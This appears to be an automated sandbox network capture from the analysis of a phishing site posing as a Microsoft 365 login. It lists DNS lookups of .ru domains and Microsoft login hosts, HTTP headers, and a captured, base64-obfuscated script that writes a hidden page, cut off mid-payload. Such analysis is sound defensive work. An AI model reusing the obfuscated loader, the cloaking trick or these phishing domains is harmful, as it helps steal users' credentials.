                                                                Jan 7, 2025 22:35:58.510368109 CET53609041.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:35:58.520061970 CET53650521.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:35:58.660202026 CET53549371.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:35:58.660573006 CET53498621.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:35:59.704672098 CET53534231.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:00.809001923 CET5988453192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:00.809159994 CET6498653192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:00.811152935 CET6414353192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:00.811439991 CET5825153192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:00.813335896 CET6200153192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:00.813536882 CET5240853192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:00.815706015 CET53649861.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:00.815747023 CET53598841.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:00.818007946 CET53641431.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:00.818166971 CET53582511.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:00.820009947 CET53620011.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:00.820158958 CET53524081.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:01.570638895 CET4936453192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:01.570813894 CET5675653192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:01.577447891 CET53567561.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:01.577889919 CET53493641.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:01.601330042 CET5099553192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:01.601485968 CET5009753192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:01.608141899 CET53509951.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:01.609070063 CET53500971.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:03.002149105 CET5331053192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:03.002285957 CET5445953192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:03.009283066 CET53544591.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:03.009435892 CET53533101.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:03.019788980 CET5003053192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:03.019957066 CET5989053192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:03.026634932 CET53500301.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:03.027394056 CET53598901.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:05.300585985 CET6320853192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:05.300741911 CET5124553192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:05.307399035 CET53632081.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:05.308177948 CET53512451.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:14.774655104 CET6037753192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:16.693098068 CET53618881.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:30.197835922 CET5799153192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:30.197995901 CET6403353192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:30.255450010 CET53579911.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:30.333600998 CET53640331.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:31.354701996 CET6449953192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:31.354871035 CET5814153192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:31.357285976 CET5769453192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:31.357445955 CET6194953192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:31.453022957 CET53576941.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:31.453756094 CET53619491.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:32.401396036 CET5836053192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:32.401540041 CET6552153192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:32.409146070 CET53655211.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:34.457012892 CET6118953192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:34.457185984 CET5544853192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:34.495917082 CET53554481.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:35.540203094 CET4959953192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:35.540345907 CET5017853192.168.2.161.1.1.1
                                                                Jan 7, 2025 22:36:35.546946049 CET53495991.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:35.547673941 CET53501781.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:35.710331917 CET53613631.1.1.1192.168.2.16
                                                                Jan 7, 2025 22:36:40.568964958 CET53538491.1.1.1192.168.2.16
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Jan 7, 2025 22:36:30.333683968 CET192.168.2.161.1.1.1c2b9(Port unreachable)Destination Unreachable
                                                                Jan 7, 2025 22:36:34.496030092 CET192.168.2.161.1.1.1c277(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 7, 2025 22:34:49.339667082 CET192.168.2.161.1.1.10x9d8dStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:35:01.829521894 CET192.168.2.161.1.1.10xb7d7Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:35:15.859477997 CET192.168.2.161.1.1.10x2e00Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:35:58.506269932 CET192.168.2.161.1.1.10xece8Standard query (0)sung.ethamoskag.ruA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:35:58.506778002 CET192.168.2.161.1.1.10x4be3Standard query (0)sung.ethamoskag.ru65IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.809001923 CET192.168.2.161.1.1.10x5b3eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.809159994 CET192.168.2.161.1.1.10x59e7Standard query (0)code.jquery.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.811152935 CET192.168.2.161.1.1.10xcc70Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.811439991 CET192.168.2.161.1.1.10x8503Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.813335896 CET192.168.2.161.1.1.10xacd8Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.813536882 CET192.168.2.161.1.1.10xf5d5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.570638895 CET192.168.2.161.1.1.10xda66Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.570813894 CET192.168.2.161.1.1.10xf81fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.601330042 CET192.168.2.161.1.1.10x3779Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.601485968 CET192.168.2.161.1.1.10xc29fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.002149105 CET192.168.2.161.1.1.10x4570Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.002285957 CET192.168.2.161.1.1.10x3cd6Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.019788980 CET192.168.2.161.1.1.10xc7a2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.019957066 CET192.168.2.161.1.1.10x4ee5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:05.300585985 CET192.168.2.161.1.1.10xbcd5Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:05.300741911 CET192.168.2.161.1.1.10x3f03Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:14.774655104 CET192.168.2.161.1.1.10xf76dStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:30.197835922 CET192.168.2.161.1.1.10xfd4fStandard query (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ruA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:30.197995901 CET192.168.2.161.1.1.10xced9Standard query (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru65IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.354701996 CET192.168.2.161.1.1.10x19c5Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.354871035 CET192.168.2.161.1.1.10x5578Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.357285976 CET192.168.2.161.1.1.10xac86Standard query (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ruA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.357445955 CET192.168.2.161.1.1.10x1010Standard query (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru65IN (0x0001)false
                                                                Jan 7, 2025 22:36:32.401396036 CET192.168.2.161.1.1.10x7c25Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:32.401540041 CET192.168.2.161.1.1.10xcb28Standard query (0)www.office.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.457012892 CET192.168.2.161.1.1.10x9a20Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.457185984 CET192.168.2.161.1.1.10x5956Standard query (0)www.office.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:35.540203094 CET192.168.2.161.1.1.10x596cStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:35.540345907 CET192.168.2.161.1.1.10xbabStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 7, 2025 22:34:41.323355913 CET1.1.1.1192.168.2.160xe42aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:34:41.323355913 CET1.1.1.1192.168.2.160xe42aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:34:49.347393990 CET1.1.1.1192.168.2.160x9d8dNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:35:01.838659048 CET1.1.1.1192.168.2.160xb7d7No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:35:15.866898060 CET1.1.1.1192.168.2.160x2e00No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:35:58.660202026 CET1.1.1.1192.168.2.160x4be3No error (0)sung.ethamoskag.ru65IN (0x0001)false
                                                                Jan 7, 2025 22:35:58.660573006 CET1.1.1.1192.168.2.160xece8No error (0)sung.ethamoskag.ru172.67.206.114A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:35:58.660573006 CET1.1.1.1192.168.2.160xece8No error (0)sung.ethamoskag.ru104.21.77.92A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.815747023 CET1.1.1.1192.168.2.160x5b3eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.815747023 CET1.1.1.1192.168.2.160x5b3eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.815747023 CET1.1.1.1192.168.2.160x5b3eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.815747023 CET1.1.1.1192.168.2.160x5b3eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.818007946 CET1.1.1.1192.168.2.160xcc70No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.818007946 CET1.1.1.1192.168.2.160xcc70No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.818166971 CET1.1.1.1192.168.2.160x8503No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.820009947 CET1.1.1.1192.168.2.160xacd8No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.820009947 CET1.1.1.1192.168.2.160xacd8No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:00.820158958 CET1.1.1.1192.168.2.160xf5d5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.577447891 CET1.1.1.1192.168.2.160xf81fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.577889919 CET1.1.1.1192.168.2.160xda66No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.577889919 CET1.1.1.1192.168.2.160xda66No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.608141899 CET1.1.1.1192.168.2.160x3779No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.608141899 CET1.1.1.1192.168.2.160x3779No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.608141899 CET1.1.1.1192.168.2.160x3779No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:01.608141899 CET1.1.1.1192.168.2.160x3779No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.009283066 CET1.1.1.1192.168.2.160x3cd6No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.009435892 CET1.1.1.1192.168.2.160x4570No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.009435892 CET1.1.1.1192.168.2.160x4570No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.026634932 CET1.1.1.1192.168.2.160xc7a2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.026634932 CET1.1.1.1192.168.2.160xc7a2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:03.027394056 CET1.1.1.1192.168.2.160x4ee5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 7, 2025 22:36:05.307399035 CET1.1.1.1192.168.2.160xbcd5No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:14.782241106 CET1.1.1.1192.168.2.160xf76dNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:30.255450010 CET1.1.1.1192.168.2.160xfd4fNo error (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:30.255450010 CET1.1.1.1192.168.2.160xfd4fNo error (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:30.333600998 CET1.1.1.1192.168.2.160xced9No error (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru65IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.362238884 CET1.1.1.1192.168.2.160x5578No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.362432957 CET1.1.1.1192.168.2.160x19c5No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.453022957 CET1.1.1.1192.168.2.160xac86No error (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.453022957 CET1.1.1.1192.168.2.160xac86No error (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:31.453756094 CET1.1.1.1192.168.2.160x1010No error (0)oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru65IN (0x0001)false
                                                                Jan 7, 2025 22:36:32.408771038 CET1.1.1.1192.168.2.160x7c25No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:32.408771038 CET1.1.1.1192.168.2.160x7c25No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:32.409146070 CET1.1.1.1192.168.2.160xcb28No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:32.409146070 CET1.1.1.1192.168.2.160xcb28No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:33.579683065 CET1.1.1.1192.168.2.160x1dddNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:33.579683065 CET1.1.1.1192.168.2.160x1dddNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.434478045 CET1.1.1.1192.168.2.160xa622No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.434478045 CET1.1.1.1192.168.2.160xa622No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.464334965 CET1.1.1.1192.168.2.160x9a20No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.464334965 CET1.1.1.1192.168.2.160x9a20No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.495917082 CET1.1.1.1192.168.2.160x5956No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:34.495917082 CET1.1.1.1192.168.2.160x5956No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:35.546946049 CET1.1.1.1192.168.2.160x596cNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:35.546946049 CET1.1.1.1192.168.2.160x596cNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:35.546946049 CET1.1.1.1192.168.2.160x596cNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 22:36:35.547673941 CET1.1.1.1192.168.2.160xbabNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 22:36:35.547673941 CET1.1.1.1192.168.2.160xbabNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                • sung.ethamoskag.ru
                                                                • https:
                                                                  • challenges.cloudflare.com
                                                                  • cdnjs.cloudflare.com
                                                                  • code.jquery.com
                                                                  • oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru
                                                                • a.nel.cloudflare.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1649722172.67.206.1144437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:35:59 UTC669OUTGET /0cUrcw3/ HTTP/1.1
                                                                Host: sung.ethamoskag.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-User: ?1
                                                                Sec-Fetch-Dest: document
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:00 UTC1238INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: no-cache, private
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HISFi5ySaj25y1SYdrWDc9ytHpZSkQE9oYr0EAE8JOPChqd8mf5nCqoJdWUPQ%2B5DR5kQJZln3Ju%2FHwcTFYKEL8ko8tCHJUXFcg5c1BrcfSGB4LLEnKVYUyZ35IxogA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=946&min_rtt=933&rtt_var=271&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1575&delivery_rate=4292993&cwnd=252&unsent_bytes=0&cid=202384add5fcfaf1&ts=416&x=0"
                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6InVnRlMyak5RQzhaaXN4ZGpIOWJnVVE9PSIsInZhbHVlIjoiN1lqdW5LenhEbTVENFBHeGgvK1lMVUVlb1k1SGZtaEMwanhlV096Y0lDR2cyek9KTEQrbmJwVGttVUFYWFNUek1CTWdhR29nTkNPN3pJcllIRTgxV0xZN01aakJWaTlPWlM1TEo3bkZ5bnY5ZUtBcmdRUUxRN1p3Y0MwY0M4Q1EiLCJtYWMiOiI2MWQ2Yjg0NTI1YjE2ZjBmYjNmMGJiNDI2Y2E1YTI2ZDlhN2Q1ZWQzYzZiZDQ2OTE1NmU3OGRkNDgxZTkxYjMxIiwidGFnIjoiIn0%3D; expires=Tue, 07-Jan-2025 23:36:00 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                2025-01-07 21:36:00 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 46 54 4d 58 63 31 63 6a 4a 4d 4f 54 42 36 56 45 56 50 56 57 31 33 61 48 51 72 5a 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 57 68 30 57 6c 64 4a 61 6c 56 76 57 57 6c 4f 65 6b 6c 43 53 79 73 7a 4c 32 4a 44 5a 6c 46 52 64 57 4a 52 55 46 46 57 59 33 42 49 53 57 4e 69 65 48 6c 74 4d 32 78 76 4d 54 6c 32 62 6a 52 31 51 54 42 78 63 46 64 36 56 30 4e 71 54 57 45 79 61 32 4a 36 65 6d 5a 74 53 7a 64 43 4d 6d 5a 43 65 6b 6c 42 59 32 49 31 5a 58 68 43 62 6c 52 45 5a 43 39 31 65 57 4a 75 56 57 74 55 61 55 78 4a 59 56 42 68 5a 6e 59 31 5a 48 56 78 63 55 52 42 56 32 4e 4f 59 6c 45 76 56 58 49 76 51 58 6c 4a 61 46 4d 32 63 47 31 54 4d 33 59
                                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlFTMXc1cjJMOTB6VEVPVW13aHQrZFE9PSIsInZhbHVlIjoiMWh0WldJalVvWWlOeklCSyszL2JDZlFRdWJRUFFWY3BISWNieHltM2xvMTl2bjR1QTBxcFd6V0NqTWEya2J6emZtSzdCMmZCeklBY2I1ZXhCblREZC91eWJuVWtUaUxJYVBhZnY1ZHVxcURBV2NOYlEvVXIvQXlJaFM2cG1TM3Y
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 34 64 31 30 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 32 56 69 35 6c 64 47 68 68 62 57 39 7a 61 32 46 6e 4c 6e 4a 31 4c 7a 42 6a 56 58 4a 6a 64 7a 4d 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58
                                                                Data Ascii: 4d10<script>if(atob("aHR0cHM6Ly92Vi5ldGhhbW9za2FnLnJ1LzBjVXJjdzMv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZX
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 32 5a 61 54 6d 52 54 59 57 31 53 53 47 77 67 4c 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 48 74 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a
